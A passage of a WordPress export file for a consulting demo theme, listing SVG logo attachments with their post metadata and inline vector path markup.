		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 141.3 30" style="enable-background:new 0 0 141.3 30;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#9E9E9E;}
</style>
<g id="_x33_">
	<g>
		<path class="st0" d="M63.8,17.8c0,0.7-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5c-0.4,0.4-0.9,0.8-1.5,1c-0.6,0.2-1.2,0.4-1.9,0.4    c-0.7,0-1.4-0.1-2-0.4c-0.6-0.2-1.1-0.6-1.6-1c-0.4-0.4-0.8-0.9-1.1-1.5c-0.3-0.6-0.4-1.2-0.4-1.9c0-0.7,0.1-1.3,0.4-1.9    c0.3-0.6,0.6-1.1,1-1.5c0.4-0.4,1-0.8,1.6-1c0.6-0.2,1.3-0.4,1.9-0.4c0.8,0,1.5,0.2,2.2,0.5c0.7,0.3,1.3,0.8,1.7,1.3l-1.6,1.4    c-0.3-0.4-0.7-0.7-1-0.9s-0.8-0.3-1.3-0.3c-0.4,0-0.7,0.1-1,0.2c-0.3,0.1-0.6,0.3-0.8,0.6s-0.4,0.5-0.5,0.9    c-0.1,0.3-0.2,0.7-0.2,1.1c0,0.4,0.1,0.8,0.2,1.1c0.1,0.3,0.3,0.6,0.6,0.9s0.5,0.4,0.8,0.6c0.3,0.1,0.7,0.2,1.1,0.2    c0.5,0,1-0.1,1.4-0.4c0.4-0.3,0.7-0.6,0.8-1.1h-2.5v-2h5V17.8z"></path>
		<path class="st0" d="M65,22.5v-9.3h4.8c0.5,0,0.9,0.1,1.3,0.2c0.4,0.1,0.7,0.4,1,0.6c0.3,0.3,0.5,0.6,0.7,0.9    c0.2,0.4,0.2,0.8,0.2,1.2c0,0.6-0.2,1.1-0.5,1.6c-0.3,0.5-0.7,0.8-1.3,1.1l2,3.7h-2.6L69,19.1h-1.7v3.4H65z M69.6,15.1h-2.3v2.1    h2.3c0.4,0,0.6-0.1,0.9-0.3c0.2-0.2,0.3-0.4,0.3-0.8c0-0.3-0.1-0.6-0.3-0.8C70.2,15.2,69.9,15.1,69.6,15.1z"></path>
		<path class="st0" d="M74.2,22.5v-9.3h7.3v2h-5.1v1.7h3.3v1.9h-3.3v1.8h5.1v2H74.2z"></path>
		<path class="st0" d="M83,22.5v-9.3h7.3v2h-5.1v1.7h3.3v1.9h-3.3v1.8h5.1v2H83z"></path>
		<path class="st0" d="M91.7,13.2h2.2l4.2,5.4v-5.4h2.2v9.3h-2l-4.4-5.6v5.6h-2.2V13.2z"></path>
		<path class="st0" d="M104.4,22.5v-9.3h2.3v3.6h3.8v-3.6h2.3v9.3h-2.3v-3.6h-3.8v3.6H104.4z"></path>
		<path class="st0" d="M123.9,17.8c0,0.7-0.1,1.3-0.4,1.9c-0.3,0.6-0.6,1.1-1.1,1.5c-0.4,0.4-1,0.8-1.6,1c-0.6,0.2-1.3,0.4-2,0.4    c-0.7,0-1.3-0.1-2-0.4c-0.6-0.2-1.1-0.6-1.6-1c-0.4-0.4-0.8-0.9-1-1.5c-0.3-0.6-0.4-1.2-0.4-1.9c0-0.7,0.1-1.3,0.4-1.9    c0.3-0.6,0.6-1.1,1-1.5c0.4-0.4,1-0.8,1.6-1c0.6-0.2,1.3-0.4,2-0.4c0.7,0,1.3,0.1,2,0.4c0.6,0.2,1.1,0.6,1.6,1    c0.4,0.4,0.8,0.9,1.1,1.5C123.8,16.5,123.9,17.2,123.9,17.8z M121.6,17.8c0-0.4-0.1-0.7-0.2-1.1c-0.1-0.3-0.3-0.6-0.6-0.9    s-0.5-0.4-0.8-0.6c-0.3-0.1-0.7-0.2-1-0.2c-0.4,0-0.7,0.1-1,0.2c-0.3,0.1-0.6,0.3-0.8,0.6c-0.2,0.2-0.4,0.5-0.6,0.9    c-0.1,0.3-0.2,0.7-0.2,1.1c0,0.4,0.1,0.7,0.2,1.1c0.1,0.3,0.3,0.6,0.6,0.9c0.2,0.2,0.5,0.4,0.8,0.6c0.3,0.1,0.7,0.2,1,0.2    c0.4,0,0.7-0.1,1-0.2c0.3-0.1,0.6-0.3,0.8-0.6c0.2-0.2,0.4-0.5,0.6-0.9C121.5,18.6,121.6,18.2,121.6,17.8z"></path>
		<path class="st0" d="M124.4,21.1l1.3-1.7c0.6,0.5,1.1,0.8,1.6,1c0.5,0.2,1,0.3,1.5,0.3c0.5,0,0.9-0.1,1.2-0.2    c0.3-0.2,0.4-0.4,0.4-0.7c0-0.3-0.1-0.5-0.3-0.6c-0.2-0.1-0.5-0.3-1-0.3l-2-0.4c-0.8-0.1-1.3-0.4-1.7-0.9c-0.4-0.4-0.6-1-0.6-1.7    c0-0.9,0.3-1.6,1-2.1c0.7-0.5,1.6-0.8,2.8-0.8c0.7,0,1.4,0.1,2.1,0.4c0.7,0.2,1.3,0.6,1.8,1l-1.2,1.7c-0.5-0.4-1-0.7-1.4-0.8    c-0.5-0.2-0.9-0.3-1.4-0.3c-0.5,0-0.8,0.1-1.1,0.2c-0.3,0.1-0.4,0.3-0.4,0.6c0,0.2,0.1,0.4,0.3,0.5c0.2,0.1,0.5,0.2,0.8,0.3    l1.9,0.3c0.9,0.1,1.6,0.4,2,0.9c0.5,0.5,0.7,1,0.7,1.8c0,0.9-0.4,1.7-1.1,2.2c-0.7,0.5-1.7,0.8-3,0.8c-0.7,0-1.5-0.1-2.2-0.4    C125.6,21.9,125,21.6,124.4,21.1z"></path>
		<path class="st0" d="M132.9,15.2v-2h8.4v2h-3v7.3H136v-7.3H132.9z"></path>
	</g>
	<path class="st0" d="M25.3,19.9c2.1,0,3.9-1.7,3.9-3.9s-1.7-3.9-3.9-3.9s-3.9,1.7-3.9,3.9S23.2,19.9,25.3,19.9z M13.9,23.1   c-1.4,0-2.5,1.1-2.5,2.5c0,1.4,1.1,2.5,2.5,2.5c1.4,0,2.5-1.1,2.5-2.5C16.5,24.2,15.3,23.1,13.9,23.1z M33.5,25.3   c-1,0-1.8,0.8-1.8,1.8s0.8,1.8,1.8,1.8c1,0,1.8-0.8,1.8-1.8S34.5,25.3,33.5,25.3z M43.8,16.3c-0.2-2.9-2.6-5.3-5.5-5.5   c-2.7-0.2-5,1.4-6,3.6l0,0c0,0,0,0,0,0l-1.7,4.1c-0.8,2-2.5,3.5-4.5,4.2h0c-1.4,0.5-3,0.1-4.1-0.9c-0.4-0.4-0.8-0.8-0.8-0.8   c-0.9-0.8-1.5-1.9-1.7-3.1c-0.1-0.4-0.1-0.8-0.1-1.2l0.2-4.5l0.1-2.1l0,0c0-0.1,0-0.1,0-0.2c0-5.7-4.8-10.2-10.5-9.8   C4.3,0.4,0.4,4.3,0,9.1C0,10,0,10.8,0.2,11.6c0.8,4.6,4.8,8,9.7,8c0.2,0,4.3,0.3,5.9,1.2l1.1,0.6c1.1,0.6,1.9,1.6,2.4,2.7l1.4,3.4   l0,0c0.4,1.4,1.6,2.5,3.2,2.5c1,0,2-0.5,2.6-1.2c0.5-0.6,4.1-4.2,4.1-4.2c0.8-0.9,2-1.4,3.2-1.5l4.8-0.3c2.5-0.2,4.5-1.9,5.3-4.2   c0.2-0.6,0.3-1.2,0.3-1.8C43.8,16.6,43.8,16.4,43.8,16.3z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>04</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/faqs/04-2/</link>
		<pubDate>Tue, 08 Sep 2020 10:44:25 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/04-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>586</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 10:44:25]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 10:44:25]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[04-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/04-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/04-1.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 88.4 30.4" style="enable-background:new 0 0 88.4 30.4;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#9E9E9E;}
</style>
<g id="_x34_">
	<path class="st0" d="M21.9,6c1.2,1,2.8,1.5,4.6,1.4c0.6,0,1.2-0.1,1.9-0.2c-1.2-1.9-2.8-3.6-4.8-4.9c-1.9-1.2-3.9-1.9-5.9-2.2   l1.8,2.8C20.1,4,20.9,5.2,21.9,6z M5.5,18.4C6.2,17.2,6.9,16,7,14.7c0.1-1-0.3-2.1-0.7-3.2L6,10.4C5.4,8.9,4.7,7.4,4.1,6   C4,5.8,3.9,5.7,3.9,5.6c0-0.1-0.1-0.1-0.1-0.2c0-0.1-0.1-0.2-0.1-0.2C3.2,5.7,2.8,6.2,2.4,6.8c-3.7,5.8-3,13,1.1,18   c-0.1-1.3,0.1-2.6,0.6-3.8C4.5,20.1,5,19.3,5.5,18.4z M30.1,18.9c0,0-0.1,0-0.1,0c-0.2,0-0.4,0-0.6,0c-0.1,0-0.2,0-0.2,0   c-1.4,0.2-2.6,0.5-3.7,1.1c-1.4,0.9-2.2,2.5-2.1,4.1c0,0.5,0.1,0.9,0.2,1.4c0.1,0.7,0.3,1.4,0.3,2.1c1.7-1.1,3.1-2.6,4.3-4.4   C29,21.9,29.7,20.4,30.1,18.9z M29.3,16.6c0.4-0.1,0.8-0.2,1.2-0.2c0.1-1.5,0-3-0.3-4.5c-0.2,0-0.4,0.1-0.5,0.1   c-0.9,0.2-1.8,0.5-2.7,0.9c-0.5,0.2-1,0.4-1.4,0.5c-1.3,0.4-3.2,0.9-5.1,0.5c-0.7-0.2-1.3-0.4-1.9-0.8c-1.1-0.7-2-1.8-2.5-3   c-0.4-1.1-0.5-2.2-0.6-3.3c0-0.6-0.1-1.1-0.2-1.6c-0.1-0.9-0.4-1.8-0.9-2.7c-0.5-1-1-1.7-1.5-2.3C10.9,0.3,9,1,7.3,2   C7.2,2.4,7,2.7,7,3C6.7,4.8,8,6.6,9,7.8C9.1,8,9.2,8.2,9.4,8.3c1.3,1.5,2.7,3.3,3,5.5c0.3,2.3-0.6,4.3-1.4,6.2   c-0.7,1.5-1.3,2.9-1.3,4.4c0,1.7,0.9,3.5,2.5,5c0.3,0.3,0.7,0.6,1.1,0.9c0.9,0.1,1.8,0.2,2.7,0.1c0.4-0.3,0.8-0.5,1.1-0.9   c0.8-1,1-2.4,1.1-3.8c0-0.2,0-0.4,0-0.6c0.1-1.5,0.1-3,0.8-4.5c0.8-1.7,2.3-3.1,4-3.6c1.3-0.4,2.7-0.4,4.1-0.4l0.1,0   c0.7,0,1.4,0.1,2,0C29.2,16.6,29.3,16.6,29.3,16.6z"></path>
	<g>
		<path class="st0" d="M48.2,15.5v4.9h-2.4v-4.9l-3.8-7.8h2.5l2.4,5.5l2.4-5.5H52L48.2,15.5z"></path>
		<path class="st0" d="M53.5,20.1c-0.6-0.3-1-0.8-1.3-1.4c-0.3-0.6-0.5-1.3-0.5-2.1v-1.5c0-0.8,0.2-1.5,0.5-2.1    c0.3-0.6,0.8-1,1.3-1.3c0.6-0.3,1.3-0.5,2.1-0.5s1.5,0.2,2.1,0.5c0.6,0.3,1,0.8,1.3,1.3c0.3,0.6,0.5,1.3,0.5,2.1v1.5    c0,0.8-0.2,1.5-0.5,2.1c-0.3,0.6-0.8,1-1.3,1.3c-0.6,0.3-1.3,0.5-2.1,0.5S54.1,20.4,53.5,20.1z M56.8,17.8    c0.3-0.3,0.4-0.7,0.4-1.2v-1.5c0-0.5-0.1-0.9-0.4-1.2s-0.6-0.4-1.1-0.4c-0.5,0-0.9,0.1-1.1,0.4c-0.3,0.3-0.4,0.7-0.4,1.2v1.5    c0,0.5,0.1,0.9,0.4,1.2c0.3,0.3,0.6,0.4,1.1,0.4S56.5,18.1,56.8,17.8z"></path>
		<path class="st0" d="M63,20.1c-0.5-0.3-0.8-0.8-1-1.3c-0.2-0.6-0.4-1.3-0.4-2.1v-1.5c0-0.8,0.1-1.6,0.4-2.2s0.6-1.1,1-1.4    s1-0.5,1.7-0.5c0.5,0,0.9,0.1,1.3,0.4c0.4,0.3,0.7,0.7,1,1.2l-0.2,2c0-0.3-0.1-0.6-0.2-0.8s-0.3-0.4-0.5-0.5    c-0.2-0.1-0.4-0.2-0.7-0.2c-0.5,0-0.8,0.2-1.1,0.5c-0.2,0.3-0.4,0.7-0.4,1.3v1.5c0,0.5,0.1,1,0.4,1.3s0.6,0.4,1.1,0.4    c0.3,0,0.5-0.1,0.7-0.2c0.2-0.1,0.4-0.3,0.5-0.5s0.2-0.5,0.2-0.8l0.1,2.1c-0.2,0.5-0.5,0.9-0.9,1.2c-0.4,0.3-0.8,0.4-1.4,0.4    C64,20.6,63.4,20.4,63,20.1z M66.7,7.7h2.4v12.8h-2.4V7.7z"></path>
		<path class="st0" d="M72.7,20.1c-0.5-0.3-0.8-0.8-1-1.3c-0.2-0.6-0.4-1.3-0.4-2.1v-1.5c0-0.8,0.1-1.6,0.4-2.2s0.6-1.1,1-1.4    s1-0.5,1.7-0.5c0.5,0,0.9,0.1,1.3,0.4c0.4,0.3,0.7,0.7,1,1.2l-0.2,2c0-0.3-0.1-0.6-0.2-0.8s-0.3-0.4-0.5-0.5    c-0.2-0.1-0.4-0.2-0.7-0.2c-0.5,0-0.8,0.2-1.1,0.5c-0.2,0.3-0.4,0.7-0.4,1.3v1.5c0,0.5,0.1,1,0.4,1.3s0.6,0.4,1.1,0.4    c0.3,0,0.5-0.1,0.7-0.2c0.2-0.1,0.4-0.3,0.5-0.5s0.2-0.5,0.2-0.8l0.1,2.1c-0.2,0.5-0.5,0.9-0.9,1.2c-0.4,0.3-0.8,0.4-1.4,0.4    C73.7,20.6,73.1,20.4,72.7,20.1z M73.7,24.2c0,0-0.3-0.1-0.9-0.4c-0.6-0.3-1-0.6-1.3-1.1l1.6-1.5c0.2,0.2,0.5,0.4,0.7,0.5    c0.3,0.1,0.6,0.2,0.9,0.2c0.5,0,0.9-0.1,1.2-0.4c0.3-0.3,0.5-0.7,0.5-1.1v-9h2.4v8.9c0,0.8-0.2,1.6-0.5,2.2    c-0.3,0.6-0.8,1.1-1.4,1.4s-1.4,0.5-2.2,0.5C74,24.2,73.7,24.2,73.7,24.2z"></path>
		<path class="st0" d="M80,11.3h2.3l3.1,7.9l-1.5,1.9L80,11.3z M88.4,11.3l-4.1,11.3c-0.2,0.4-0.3,0.7-0.6,1    c-0.2,0.2-0.5,0.4-0.8,0.5c-0.3,0.1-0.7,0.2-1.2,0.2h-0.5v-2.3h0.5c0.3,0,0.5-0.1,0.6-0.2c0.2-0.1,0.3-0.3,0.4-0.6l3.4-9.9H88.4z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>05</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/faqs/05-2/</link>
		<pubDate>Tue, 08 Sep 2020 10:44:26 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/05-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>587</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 10:44:26]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 10:44:26]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[05-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/05-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/05-1.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 143.2 31.3" style="enable-background:new 0 0 143.2 31.3;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#9E9E9E;}
</style>
<g id="_x35_">
	<g>
		<path class="st0" d="M57.2,20.5h-3.1l-0.9-2.8h-4.5l-0.9,2.8h-3.1l4.6-12.6h3.4L57.2,20.5z M52.6,15.6l-1.4-4.2    C51.1,11,51,10.6,51,10.2h-0.1c0,0.4-0.1,0.7-0.2,1.1l-1.4,4.3H52.6z"></path>
		<path class="st0" d="M63.9,20.4c-0.4,0.2-1,0.3-1.9,0.3c-2,0-2.9-1-2.9-3v-4.1h-1.5v-2h1.5V9.6l2.8-0.8v2.7h2v2h-2v3.6    c0,0.9,0.4,1.4,1.1,1.4c0.3,0,0.6-0.1,0.9-0.3V20.4z"></path>
		<path class="st0" d="M69.8,20.8c-1.5,0-2.7-0.4-3.5-1.3s-1.3-2-1.3-3.4c0-1.5,0.4-2.7,1.3-3.5c0.9-0.8,2.1-1.3,3.6-1.3    c1.5,0,2.7,0.4,3.5,1.3c0.8,0.8,1.3,2,1.3,3.3c0,1.5-0.4,2.7-1.3,3.5S71.3,20.8,69.8,20.8z M69.9,13.5c-0.7,0-1.2,0.2-1.5,0.7    s-0.5,1.1-0.5,1.9c0,1.7,0.7,2.6,2.1,2.6c1.3,0,2-0.9,2-2.7C71.9,14.3,71.2,13.5,69.9,13.5z"></path>
		<path class="st0" d="M90.8,20.5H88v-5.1c0-1.3-0.5-2-1.4-2c-0.5,0-0.8,0.2-1.1,0.6S85,14.9,85,15.5v5h-2.8v-5.2    c0-1.3-0.5-1.9-1.4-1.9c-0.5,0-0.9,0.2-1.1,0.6c-0.3,0.4-0.4,0.9-0.4,1.5v5h-2.8v-9h2.8V13h0c0.3-0.5,0.7-0.9,1.2-1.2    c0.5-0.3,1.1-0.5,1.7-0.5c1.3,0,2.1,0.6,2.6,1.7c0.7-1.1,1.7-1.7,3-1.7c2,0,2.9,1.2,2.9,3.6V20.5z"></path>
		<path class="st0" d="M94.4,10.1c-0.5,0-0.9-0.1-1.2-0.4c-0.3-0.3-0.4-0.6-0.4-1c0-0.4,0.1-0.8,0.4-1s0.7-0.4,1.2-0.4    c0.5,0,0.9,0.1,1.2,0.4s0.4,0.6,0.4,1c0,0.4-0.1,0.8-0.4,1S94.9,10.1,94.4,10.1z M95.8,20.5H93v-9h2.8V20.5z"></path>
		<path class="st0" d="M104.9,20.2c-0.6,0.4-1.5,0.5-2.7,0.5c-1.4,0-2.5-0.4-3.4-1.3s-1.3-1.9-1.3-3.2c0-1.5,0.5-2.7,1.4-3.6    s2.1-1.3,3.7-1.3c1.1,0,1.8,0.1,2.3,0.4v2.4c-0.6-0.4-1.2-0.7-1.9-0.7c-0.8,0-1.4,0.2-1.9,0.7c-0.5,0.5-0.7,1.1-0.7,1.9    c0,0.8,0.2,1.4,0.7,1.9s1.1,0.7,1.8,0.7c0.7,0,1.4-0.2,2-0.7V20.2z"></path>
		<path class="st0" d="M111.4,20.1v-2.8c0.5,0.4,1.1,0.7,1.7,1c0.6,0.2,1.2,0.3,1.8,0.3c0.4,0,0.7,0,0.9-0.1    c0.3-0.1,0.5-0.2,0.7-0.3c0.2-0.1,0.3-0.2,0.4-0.4s0.1-0.3,0.1-0.5c0-0.2-0.1-0.5-0.2-0.7s-0.3-0.4-0.6-0.5s-0.5-0.3-0.9-0.5    s-0.7-0.3-1.1-0.5c-1-0.4-1.7-0.9-2.2-1.5c-0.5-0.6-0.7-1.3-0.7-2.1c0-0.7,0.1-1.2,0.4-1.7s0.6-0.9,1.1-1.2c0.5-0.3,1-0.5,1.6-0.7    c0.6-0.1,1.2-0.2,1.9-0.2c0.7,0,1.2,0,1.7,0.1c0.5,0.1,1,0.2,1.4,0.4v2.6c-0.2-0.1-0.4-0.3-0.7-0.4s-0.5-0.2-0.8-0.3    c-0.3-0.1-0.5-0.1-0.8-0.2c-0.3,0-0.5-0.1-0.7-0.1c-0.3,0-0.6,0-0.9,0.1c-0.3,0.1-0.5,0.1-0.7,0.3s-0.3,0.2-0.4,0.4    s-0.1,0.3-0.1,0.5c0,0.2,0.1,0.4,0.2,0.6c0.1,0.2,0.3,0.3,0.5,0.5c0.2,0.1,0.5,0.3,0.7,0.4s0.6,0.3,1,0.4c0.5,0.2,1,0.4,1.4,0.7    c0.4,0.2,0.7,0.5,1,0.8s0.5,0.6,0.7,1c0.2,0.4,0.2,0.8,0.2,1.3c0,0.7-0.1,1.3-0.4,1.8c-0.3,0.5-0.6,0.9-1.1,1.2    c-0.5,0.3-1,0.5-1.6,0.6c-0.6,0.1-1.2,0.2-1.9,0.2c-0.7,0-1.3-0.1-2-0.2C112.4,20.5,111.9,20.3,111.4,20.1z"></path>
		<path class="st0" d="M129.6,20.5h-7.6V7.9h7.3v2.3h-4.4v2.8h4.1v2.3h-4.1v2.9h4.7V20.5z"></path>
		<path class="st0" d="M137,20.8c-1.8,0-3.3-0.6-4.4-1.8c-1.1-1.2-1.7-2.7-1.7-4.6c0-2,0.6-3.6,1.7-4.8s2.7-1.8,4.6-1.8    c1.8,0,3.3,0.6,4.4,1.8c1.1,1.2,1.7,2.7,1.7,4.7c0,2-0.6,3.6-1.7,4.8C140.3,20.2,138.8,20.8,137,20.8z M137.1,10.2    c-1,0-1.8,0.4-2.4,1.1c-0.6,0.7-0.9,1.7-0.9,3c0,1.2,0.3,2.2,0.9,3s1.4,1.1,2.3,1.1c1,0,1.8-0.4,2.3-1.1s0.9-1.7,0.9-2.9    c0-1.3-0.3-2.3-0.8-3S138.1,10.2,137.1,10.2z"></path>
	</g>
	<path class="st0" d="M30.3,16.2c-1.3,0-2.4,1.1-2.4,2.4c0,0.3,0.1,0.7,0.2,1l-5.4,5.4c-0.2-0.1-0.4-0.3-0.6-0.4V9.8   c2.6-0.1,4.6-2.3,4.6-4.9c0-2.7-2.2-4.9-4.9-4.9s-4.9,2.2-4.9,4.9c0,0.7,0.1,1.3,0.4,1.9l-6.8,5.3c-1.1-1.1-2.6-1.7-4.3-1.7   c-3.4,0-6.2,2.8-6.2,6.2c0,3.4,2.8,6.2,6.2,6.2c3.4,0,6.2-2.8,6.2-6.2c0-1.1-0.3-2.1-0.8-3l6.7-5.2c0.5,0.6,1.2,1,2,1.2v14.7   c-1.9,0.1-3.3,1.7-3.3,3.5c0,2,1.6,3.6,3.6,3.6c2,0,3.6-1.6,3.6-3.6c0-0.5-0.1-0.9-0.3-1.3l5.6-5.6c0.3,0.1,0.6,0.2,1,0.2   c1.3,0,2.4-1.1,2.4-2.4C32.7,17.2,31.6,16.2,30.3,16.2z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>06</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/faqs/06-2/</link>
		<pubDate>Tue, 08 Sep 2020 10:44:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/06-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>588</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 10:44:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 10:44:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[06-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/06-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/06-1.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 128 29.8" style="enable-background:new 0 0 128 29.8;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#9E9E9E;}
</style>
<g id="_x36_">
	<path class="st0" d="M12.4,9.9C10.7,8,8.2,7.2,5.8,7.5C5.6,7.9,5.4,8.3,5.2,8.7c1.3,0.3,2.6,0.9,3.6,2c2.5,2.7,2.3,6.9-0.4,9.4   c-0.9,0.9-2.1,1.4-3.2,1.6c0.1,0.2,0.2,0.4,0.3,0.5c2.3,0.5,4.7-0.1,6.5-1.8C15,17.6,15.2,12.9,12.4,9.9z M7.6,17.8   c1.4-1.9,1-4.7-1-6.1c-1.9-1.4-4.7-1-6.1,1C0.3,13,0.1,13.3,0,13.7c0.8-0.8,2-0.9,2.9-0.2c1,0.7,1.2,2.2,0.5,3.2   c-0.7,1-2.2,1.2-3.2,0.5c0,0-0.1,0-0.1-0.1c0.3,0.6,0.8,1.2,1.4,1.6C3.5,20.2,6.2,19.7,7.6,17.8z M20.7,7c-3.1-3.4-7.8-4.5-12-3.3   C8.6,3.8,8.6,3.9,8.5,3.9C7.9,4.5,7.3,5.1,6.9,5.7c2.7-0.2,5.5,0.7,7.5,2.9c3.4,3.7,3.1,9.4-0.6,12.8c-2,1.9-4.7,2.6-7.2,2.3   c0.3,0.4,0.6,0.8,1,1.2c0.3,0.4,0.7,0.7,1,1c3.8,1.2,8.2,0.4,11.4-2.5C24.7,19.1,25.1,11.8,20.7,7z M11.6,1.7   c4.1-0.5,8.5,0.9,11.5,4.2c5,5.4,4.6,13.8-0.8,18.8c-3,2.7-6.8,3.8-10.6,3.4c5.4,2.8,12.2,2.1,16.9-2.2c6.1-5.6,6.5-15,0.9-21.1   C24.9-0.3,17.5-1.4,11.6,1.7z"></path>
	<g>
		<path class="st0" d="M46.9,7.2h5.6c1.2,0,2.1,0.3,2.9,0.9c0.7,0.6,1.1,1.4,1.1,2.4c0,0.6-0.2,1.2-0.5,1.7    c-0.4,0.5-0.9,0.9-1.5,1.1c0.7,0.2,1.3,0.6,1.8,1.1c0.4,0.5,0.7,1.1,0.7,1.9c0,1-0.4,1.9-1.2,2.5c-0.8,0.6-1.8,1-3,1h-5.9V7.2z     M52.3,9h-3.2v3.5h3.2c0.6,0,1.1-0.2,1.5-0.5c0.4-0.3,0.6-0.7,0.6-1.3s-0.2-1-0.6-1.3C53.4,9.1,52.9,9,52.3,9z M52.5,18    c0.7,0,1.2-0.2,1.6-0.5c0.4-0.4,0.6-0.8,0.6-1.4s-0.2-1.1-0.6-1.4c-0.4-0.3-0.9-0.5-1.6-0.5h-3.4V18H52.5z"></path>
